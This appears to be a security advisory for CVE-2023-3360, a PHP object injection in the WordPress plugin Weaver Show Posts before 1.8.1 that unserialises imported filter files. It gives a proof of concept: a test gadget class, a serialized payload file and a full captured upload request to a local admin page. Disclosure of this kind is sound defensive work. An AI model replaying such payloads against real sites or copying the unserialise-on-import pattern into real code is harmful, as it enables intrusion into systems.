Weaver Show Posts < 1.8.1 – Admin+ PHP Object Injection | CVE 2023-3360

Description

The plugin unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import a malicious file and a suitable gadget chain is present on the blog.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:

class Test {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Create a file named "poc.txt" with the following content: O:4:"Test":0:{};

Upload the file via the "Choose File" feature in Weaver Show Posts Options > Filters

Then choose Restore Filter Options.

The view the response of the request made, which will have the "Arbitrary deserialization" message.

POST /wp/wp-admin/admin.php?page=atw_showposts_page HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp/wp-admin/admin.php?page=atw_showposts_page
Content-Type: multipart/form-data; boundary=---------------------------427852641230129627391233594009
Content-Length: 7121
Origin: http://localhost
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_save_filter_opts"

Filter Options Saved
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="selected_filter"

default
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="filter_name"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_restore_filter"

Restore Filter
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="post_uploaded"; filename="poc.txt"
Content-Type: text/plain

O:4:"Test":0:{} 
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="uploadit"

yes
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_set_to_filter_nonce"

c8b18810a1
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_delete_filter_nonce"

c79cb7886e
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_new_filter_nonce"

1504a8ce6d
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_duplicate_filter_nonce"

3a4a27a420
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_restore_filter_nonce"

50c815cfa4
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="more_msg"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="show"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="posts_per_page"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="offset"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="excerpt_length"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="cols"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="orderby"

date
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="order"

DESC
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="post_type_selection"

post
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="post_type"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_add_post_type_nonce"

87645856de
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="category_name_selection"

uncategorized
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="category_name"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_add_category_name_nonce"

63c7e1dc00
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_hide_category_name_nonce"

5b423e0f27
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="tag"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_add_tag_nonce"

30f1d28db4
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="post_ids"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="post_slug"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="author_selection"

1
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="author"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_add_author_nonce"

673adc0074
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="date_selection"

today
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="date"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_add_date_nonce"

66ca9d1837
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="taxonomy"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="wp_query_args"


-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="atw_posts_save_filter_opts_nonce"

877e66c042
-----------------------------427852641230129627391233594009
Content-Disposition: form-data; name="_wp_http_referer"

/wp/wp-admin/admin.php?page=atw_showposts_page
-----------------------------427852641230129627391233594009--